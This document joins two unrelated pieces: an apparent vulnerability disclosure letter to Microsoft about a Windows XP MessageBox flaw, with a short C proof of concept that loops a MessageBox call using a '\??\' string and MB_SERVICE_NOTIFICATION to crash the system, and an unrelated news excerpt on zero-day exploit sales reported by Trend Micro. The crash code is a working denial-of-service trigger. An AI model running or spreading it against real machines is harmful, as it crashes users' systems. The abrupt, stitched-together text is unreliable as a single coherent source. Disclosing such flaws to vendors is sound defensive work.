Dear Secure@microsoft.com,
On one of Russian forum security vulnerability is discussed in
Microsoft Windows (Windows XP is tested). A vulnerability is caused by
memory corruption is string beginning with "\?\" is send thorugh
MessageBox API with MB_SERVICE_NOTIFICATION flag. It looks like some
"debug" feature not cleaned out in final release and it seems to
exploitable to code execution at kernel level. Code example below:
#include <stdio.h>
#include <windows.h>
int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}
System hangs, crashes (BSOD) or reboots.
Underground hackers are hawking zero-day exploits for Microsoft's new Windows Vista operating system at $50,000 a pop, according to computer security researchers at Trend Micro.
The Windows Vista exploit—which has not been independently verified—was just one of many zero-days available for sale at an auction-style marketplace infiltrated by the Tokyo-based anti-virus vendor.
In an interview with eWEEK, Trend Micro's chief technology officer, Raimund Genes, said prices for exploits for unpatched code execution flaws are in the $20,000 to $30,000 range, depending on the popularity of the software and the reliability of the attack code.
Bots and Trojan downloaders that typically hijack Windows machines for use in spam-spewing botnets were being sold for about $5,000, Genes said.
|